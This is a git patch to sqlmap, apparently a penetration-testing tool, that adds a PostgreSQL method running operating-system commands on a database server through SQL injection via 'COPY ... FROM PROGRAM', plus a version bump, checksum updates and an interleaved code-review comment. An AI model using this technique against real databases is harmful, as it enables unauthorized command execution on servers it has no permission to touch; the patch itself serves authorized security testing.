From ef5cb9a4606b863b5dd2ac5bf45472c877256943 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 21 Mar 2019 13:57:17 +0100
Subject: [PATCH] In preparation for #3545
---
 lib/core/settings.py | 2 +-
 plugins/dbms/postgresql/takeover.py | 12 ++++++++++++
 txt/checksum.md5 | 4 ++--
 3 files changed, 15 insertions(+), 3 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index fb02d01cf..384b7c943 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS
 
 # sqlmap version (...)
-VERSION = "1.3.3.39"
+VERSION = "1.3.3.40"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index 13edbbce1..3af69331a 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -102,3 +102,15 @@ class Takeover(GenericTakeover):
         self.createSupportTbl(self.fileTblName, self.tblField, "text")
         inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
         self.cleanup(onlyFileTbl=True)
+
+    def copyExecCmd(self, cmd):
+        # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+        self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
+        self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
+        self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
+        inject.goStacked(self._forgedCmd)
+
+        query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
+        output = inject.getValue(query, resumeValue=False)
+
+        return output
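Review bot: In the new copyExecCmd the assembled statement is kept on `self._forgedCmd` although nothing else in the hunk reads it, so a plain local such as `forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName` (with the two `+=` lines and the `goStacked` call following suit) avoids leaving the last SQL string attached to the instance; keep the attribute only if another method relies on it. The method also has no docstring, and the only hint at its preconditions is the reference URL; I would add `"""Run *cmd* via server-side ``COPY ... FROM PROGRAM`` and return its captured output. Needs stacked queries and a database role allowed to use COPY FROM PROGRAM (superuser, or pg_execute_server_program on PostgreSQL 11+)."""` so readers see that the technique is gated on that privilege rather than on PostgreSQL alone. The enclosing class Takeover begins above the hunk.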
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index c83b704f9..df76c6faa 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -50,7 +50,7 @@ d5ef43fe3cdd6c2602d7db45651f9ceb lib/core/readlineng.py
 7d8a22c582ad201f65b73225e4456170 lib/core/replication.py
 3179d34f371e0295dd4604568fb30bcd lib/core/revision.py
 d6269c55789f78cf707e09a0f5b45443 lib/core/session.py
-e785996e0f9edd8e309094048dc40d05 lib/core/settings.py
+068159b771eef31a3852da30eba31ccd lib/core/settings.py
 4483b4a5b601d8f1c4281071dff21ecc lib/core/shell.py
 10fd19b0716ed261e6d04f311f6f527c lib/core/subprocessng.py
 10d7e4f7ba2502cce5cf69223c52eddc lib/core/target.py
@@ -199,7 +199,7 @@ d68b5a9d6e608f15fbe2c520613ece4a plugins/dbms/postgresql/filesystem.py
 a2ac0498d89797041bf65e4990cf8430 plugins/dbms/postgresql/fingerprint.py
 fb018fd23dcebdb36dddd22ac92efa2c plugins/dbms/postgresql/__init__.py
 290ea28e1215565d9d12ede3422a4dcf plugins/dbms/postgresql/syntax.py
-339bc65824b5c946ec40a12cd0257df1 plugins/dbms/postgresql/takeover.py
+cee109ef785cd1ebbc1df5311246094d plugins/dbms/postgresql/takeover.py
 014968f7b28abe3ca8e533843a017453 plugins/dbms/sqlite/connector.py
 6a0784e3ce46b6aa23dde813c6bc177f plugins/dbms/sqlite/enumeration.py
 3c0adec05071fbe655a9c2c7afe52721 plugins/dbms/sqlite/filesystem.py